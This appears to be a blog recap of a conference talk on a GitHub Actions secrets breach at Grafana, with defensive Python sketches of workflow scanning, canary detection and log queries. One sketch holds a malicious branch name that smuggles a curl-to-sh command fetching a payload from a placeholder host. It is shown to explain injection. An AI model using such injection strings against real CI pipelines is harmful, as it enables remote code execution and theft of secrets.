Grafana’s CI/CD Nightmare: Lessons from a Security Incident Gone Wrong (But Ended Right!) 🚀

Hey tech enthusiasts! Gather ‘round because we’re diving deep into a real-world security incident that reads like a thriller novel. Nick, a Principal Security Engineer at Grafana, and David, from the Security Engineering Team, shared their harrowing experience at GrafanaCON, where “almost everything that could go wrong, did go wrong.” But don’t worry, it all ends on a high note! 🥳

This isn’t just a story of a breach; it’s a masterclass in how preparation, the right tools, and a proactive mindset can turn a disaster into a learning opportunity.

The “Oh God” Moment: A CI/CD Compromise 😱

It all started on a seemingly normal Saturday morning. Two sharp-eyed security team members spotted a peculiar alert. This wasn’t just any alert; it signaled a complete CI/CD compromise. All of Grafana’s secrets had been exfiltrated by an attacker. Imagine the sinking feeling! 🥶

While most organizations would be in full panic mode, Grafana’s team was able to quickly confirm something crucial: no customer or user impact whatsoever. The attacker hadn’t managed to leverage the stolen secrets for any malicious purposes. Phew! 🙏

Let’s unravel how this happened, the challenges they faced, and the ingenious ways they navigated the crisis.

The Devil is in the Details: GitHub Actions Triggers 😈

David kicked off the technical deep-dive by highlighting a critical distinction in GitHub Actions: pull_request vs. pull_request_target.

  • pull_request: This is the safe default. For pull requests from forks, the workflow runs with a read-only token and no access to your repository secrets. All good! 👍
  • pull_request_target: This is where things get dicey. The workflow runs in the context of the base repository, with access to its secrets and a token that can have write access. It’s designed for legitimate maintenance tasks but becomes a gaping security hole when combined with user-controlled inputs.

This subtle difference, the gap between “looks safe” and “is safe,” was the attacker’s entry point.
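
To make that gap concrete, here is a minimal Python sketch of the kind of check a static analyzer could run. The function name, the list of contexts, and the sample workflow are assumptions for illustration, not anything shown in the talk. It flags a workflow only when it both triggers on pull_request_target and interpolates a value that a pull request author controls.

```python
import re

# Contexts an external contributor can control from a pull request.
# Illustrative, not exhaustive.
UNTRUSTED_CONTEXTS = (
    "github.head_ref",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
)

TRIGGER_RE = re.compile(r"\bpull_request_target\b")
EXPR_RE = re.compile(r"\$\{\{\s*([^}]+?)\s*\}\}")


def risky_interpolations(workflow_text: str) -> list[str]:
    """Return untrusted expressions found in a pull_request_target workflow."""
    if not TRIGGER_RE.search(workflow_text):
        return []
    found = []
    for expr in EXPR_RE.findall(workflow_text):
        if expr in UNTRUSTED_CONTEXTS and expr not in found:
            found.append(expr)
    return found


# Hypothetical workflow, written for this example only.
SAMPLE_WORKFLOW = """\
on: pull_request_target
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Checking branch ${{ github.head_ref }}"
"""

print(risky_interpolations(SAMPLE_WORKFLOW))
```

This is a text-level check that does not parse YAML, so it would also flag safe uses such as mapping the value into an env entry. A real analyzer is considerably more careful.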

The Attack Vector: A Benevolent Change and a Malicious Payload 🎯

On April 25th, a seemingly innocuous change was merged. It looked like a CI improvement, contributed internally by a Grafana employee. However, it switched the trigger from pull_request to pull_request_target and combined that with a script step that used input from the pull request.

The attacker leveraged this by:

  1. Creating a Fork: Anyone can fork a public repository, and Grafana is an open-source company.
  2. Triggering the Workflow: Opening a pull request from that fork against Grafana’s repo.
  3. Exploiting the Vulnerability: The attacker could now run arbitrary commands in a workflow that had access to Grafana’s secrets.

The payload? Surprisingly simple: a branch name that the workflow interpolated into its script. This branch name contained a command to download a GitHub gist filled with malicious code. The attacker used Gato-X, a tool designed to scan and exploit GitHub Actions workflows at scale.
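
Why does a branch name turn into code? The Python sketch below mimics the substitution step under stated assumptions: the helper name, the echo step, and the branch name are hypothetical, and the host is a placeholder rather than anything from the incident. The key point is that the expression is replaced in the script text before the shell runs it.

```python
def expand_expression(run_template: str, head_ref: str) -> str:
    """Mimic how a ${{ github.head_ref }} expression is pasted into the
    script text before the shell ever sees it."""
    return run_template.replace("${{ github.head_ref }}", head_ref)


# Hypothetical branch name carrying a shell command substitution.
# ${IFS} stands in for spaces, which Git branch names cannot contain.
malicious_branch = "fix-$(curl${IFS}-s${IFS}example.invalid/payload|sh)"

# Unsafe: the branch name becomes part of the script itself.
unsafe_step = 'echo "Building ${{ github.head_ref }}"'
unsafe_script = expand_expression(unsafe_step, malicious_branch)
print(unsafe_script)

# Safer pattern: the script reads an environment variable, so the
# branch name reaches the shell as data rather than as script text.
safe_script = 'echo "Building $HEAD_REF"'
safe_env = {"HEAD_REF": malicious_branch}
print(safe_script)
```

In the unsafe version the shell would see a command substitution and execute it. In the safer version the script text never changes, whatever the branch is called.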

Nick highlighted a significant challenge: Grafana’s reliance on GitHub Actions secrets.

  • GitHub Actions Secrets: These are convenient but can be very liberal in how they provide secrets. They’re often directly injected into the environment without additional checks, making them an easy target for scripts that fetch everything.

While some Grafana repositories had migrated to HashiCorp Vault (a more secure, multi-gate approach), many hadn’t. This meant the attacker, armed with the compromised GitHub token, could access everything in the affected repositories.
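
A small Python sketch shows why environment-injected secrets are such an easy target. It demonstrates plain process environment inheritance only; the variable name and value are placeholders, and nothing here calls GitHub.

```python
import os
import subprocess
import sys

# Placeholder name and value; not a real credential.
env_with_secret = {**os.environ, "DEMO_DEPLOY_TOKEN": "not-a-real-secret"}

# Any child process started by a step inherits the environment,
# so it can read the value without any further check.
child_code = "import os; print(os.environ.get('DEMO_DEPLOY_TOKEN', 'missing'))"
result = subprocess.run(
    [sys.executable, "-c", child_code],
    env=env_with_secret,
    capture_output=True,
    text=True,
    check=True,
)
leaked_value = result.stdout.strip()
print(leaked_value)
```

A secret store that requires an explicit, authenticated fetch adds a gate that this kind of blanket inheritance does not have.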

The Timeline of Terror: From Vulnerability to Compromise ⏳

The attack unfolded with alarming speed:

  • 16:40: The pull request introducing the vulnerable change was opened.
  • 17:52: The change was merged, making Grafana vulnerable.
  • Later: A security researcher reported the vulnerability through the bug bounty program, but due to processing times, Grafana couldn’t respond immediately.
  • 04:30 (Next Day): The attacker ran Gato-X and began exfiltrating secrets, about 10 and a half hours after the vulnerable change was merged.
  • 16:15: The attacker began exploring the stolen secrets, triggering Grafana’s internal alerting system. This was the moment the security team sprang into action.
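
The gaps in that timeline are easy to check with a few lines of Python. One assumption is labeled in the code: the recap does not say which day the 16:15 alert fired, so the sketch treats it as the same day as the exfiltration.

```python
from datetime import timedelta

# Times from the timeline, as offsets from midnight on the day
# the change was merged.
pr_opened = timedelta(hours=16, minutes=40)
merged = timedelta(hours=17, minutes=52)
exfiltration = timedelta(days=1, hours=4, minutes=30)
# Assumption: the 16:15 alert fired on the same day as the exfiltration.
alert = timedelta(days=1, hours=16, minutes=15)

review_window = merged - pr_opened
exposure_window = exfiltration - merged
detection_delay = alert - exfiltration

print(review_window)    # 1:12:00
print(exposure_window)  # 10:38:00
print(detection_delay)  # 11:45:00
```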

The Response Arsenal: Tools That Saved the Day 🛠️

Grafana’s response was swift and effective, thanks to a well-equipped security toolkit:

  • IRM (Incident Response & Management): A cornerstone for coordination, communication, and keeping everyone on the same page. It integrates with Slack and Google Docs, and is freely available in Grafana Cloud.
  • Loki: Grafana’s log storage database. Crucially, all key logs from GitHub were streamed to Loki, providing a persistent, queryable record that attackers couldn’t delete and that wouldn’t expire. This was invaluable for understanding the full extent of the compromise.
  • Zizmor: An open-source tool for static analysis of GitHub Actions workflows. It flags potentially dangerous patterns like pull_request_target and unpinned actions, helping to identify vulnerabilities before they’re exploited. Grafana even contributed an automated fix suggestion feature to Zizmor! 💡
  • TruffleHog: A dual-use tool that finds secrets and can verify them against live services. The attacker used it to validate the stolen credentials, and that validation touched a “canary token,” which is how the breach was detected.
  • Gato-X: The very tool the attacker used! Running Gato-X themselves gave Grafana an “attacker’s eye view,” helping them identify any missed vulnerabilities.
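
To give a feel for the “queryable record” part of the Loki bullet above, here is a hedged Python sketch that builds a request URL for Loki’s HTTP range-query endpoint. The host, the source label, and the timestamps are assumptions made up for this example; the talk recap does not say how Grafana labels its GitHub logs.

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def build_query_range_url(base_url, logql, start_ns, end_ns, limit=1000):
    """Build a URL for Loki's HTTP range-query endpoint."""
    params = urlencode(
        {"query": logql, "start": start_ns, "end": end_ns, "limit": limit}
    )
    return f"{base_url.rstrip('/')}/loki/api/v1/query_range?{params}"


# Hypothetical stream label; the line filter keeps only matching log lines.
LOGQL = '{source="github-audit"} |= "pull_request_target"'

# Arbitrary example window of 24 hours, in nanoseconds since the Unix epoch.
START_NS = 1_700_000_000_000_000_000
END_NS = START_NS + 24 * 60 * 60 * 1_000_000_000

url = build_query_range_url("https://loki.example.invalid/", LOGQL, START_NS, END_NS)
print(url)

# Round trip: the encoded query decodes back to the original LogQL.
print(parse_qs(urlsplit(url).query)["query"][0])
```

The sketch only constructs the URL. Sending it would also need authentication, which depends on the deployment.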

The Secret Weapon: Canary Tokens and Observability 🕊️

The initial detection was a stroke of luck, thanks to security canary tokens. These are low-privilege tokens with no real function, distributed throughout the infrastructure. The moment an attacker tries to use one, an alert fires.

  • The “Canary in the Coal Mine”: One of Grafana’s canary tokens, disguised as a juicy AWS key, was used by the attacker to validate their stolen credentials via TruffleHog. This triggered the alert that brought the security team in.
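
The detection logic behind a canary can be very small. The Python sketch below assumes a hypothetical event format and uses key IDs from AWS’s public documentation examples plus documentation-range IP addresses; it is not Grafana’s alerting pipeline.

```python
from dataclasses import dataclass

# Key IDs that exist only as bait. This one is AWS's documented example ID.
CANARY_KEY_IDS = {"AKIAIOSFODNN7EXAMPLE"}


@dataclass(frozen=True)
class AccessEvent:
    """Hypothetical shape of one credential-use log record."""
    access_key_id: str
    source_ip: str
    action: str


def canary_alerts(events):
    """Return one alert message per event that used a canary key."""
    return [
        f"CANARY USED: {e.access_key_id} from {e.source_ip} ({e.action})"
        for e in events
        if e.access_key_id in CANARY_KEY_IDS
    ]


events = [
    AccessEvent("AKIAI44QH8DHBEXAMPLE", "198.51.100.9", "s3:ListBuckets"),
    AccessEvent("AKIAIOSFODNN7EXAMPLE", "203.0.113.7", "sts:GetCallerIdentity"),
]

alerts = canary_alerts(events)
for line in alerts:
    print(line)
```

Because a canary has no legitimate use, any hit is worth an alert, which keeps the false-positive rate close to zero.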

This highlights the power of observability, not just in production, but in CI/CD pipelines as well. It’s about turning findings into actionable insights.

Lessons Learned: Preparation Beats Reaction ✨

The incident, while terrifying, provided invaluable lessons:

  1. Preparation is Paramount: Proactive measures like canaries, static analysis, and good secret hygiene enable a response, not just a frantic reaction.
  2. CI/CD Observability is Crucial: Don’t neglect visibility in your build and deployment pipelines.
  3. Open Source is a Double-Edged Sword: It empowers attackers but also defenders. Leveraging open-source tools like Zizmor and TruffleHog was a significant advantage.
  4. Earn Your Post-Incident Report: The ability to confidently state “no customer impact” is earned through diligent preparation and response.

The Path Forward: Strengthening Grafana’s Defenses 💪

Following the incident, Grafana implemented several critical changes:

  • Migrated Secrets to Vault: Moving away from the convenience of GitHub Actions secrets to the more secure, albeit more complex, HashiCorp Vault. This introduced some “pain” for developers but was the right security choice.
  • Mandatory Scans: Implementing Zizmor and TruffleHog scans as mandatory checks for every pull request against any GitHub repo in the Grafana organization.
  • Broadened Canary Token Coverage: Distributing more canary tokens to create a more “hellscapey” environment for attackers.
  • Reduced GitHub App Access: Significantly shrinking the broad access that GitHub Apps can sometimes have and revoking “super user” privileges.
  • User Education: Emphasizing that even security experts can miss edge cases, and continuous education is vital.
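
One pattern that mandatory scans of this kind look for is an action referenced by a tag instead of a full commit SHA. Here is a minimal Python sketch of such a check; the regexes, the sample workflow, and the placeholder SHA are assumptions for illustration and not how Zizmor is implemented.

```python
import re

USES_RE = re.compile(r"^[ \t]*-?[ \t]*uses:[ \t]*([^\s#]+)", re.MULTILINE)
FULL_SHA_RE = re.compile(r"@[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[str]:
    """Return action references that are not pinned to a full commit SHA."""
    refs = USES_RE.findall(workflow_text)
    return [
        ref
        for ref in refs
        if not ref.startswith("./")  # local actions live in the same repo
        and not FULL_SHA_RE.search(ref)
    ]


# Hypothetical workflow; the 40-character SHA is a placeholder.
SAMPLE_WORKFLOW = """\
steps:
  - uses: actions/checkout@v4
  - uses: example-org/example-action@0123456789abcdef0123456789abcdef01234567
  - uses: ./.github/actions/local
"""

print(unpinned_actions(SAMPLE_WORKFLOW))
```

A tag can be moved to point at different code later, while a full commit SHA cannot, which is why pinning narrows the supply chain risk.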

These measures proved their worth when Grafana encountered similar supply chain attacks impacting other organizations (like Aqua Security and Axios). Due to their strengthened defenses, Grafana was “touched” but not “hit,” preventing any data theft and allowing for verification within hours, not weeks.

This incident serves as a powerful reminder that in the ever-evolving landscape of cybersecurity, vigilance, robust tooling, and a commitment to continuous improvement are not just good practices – they’re essential for survival. Great job, Grafana team! 👏
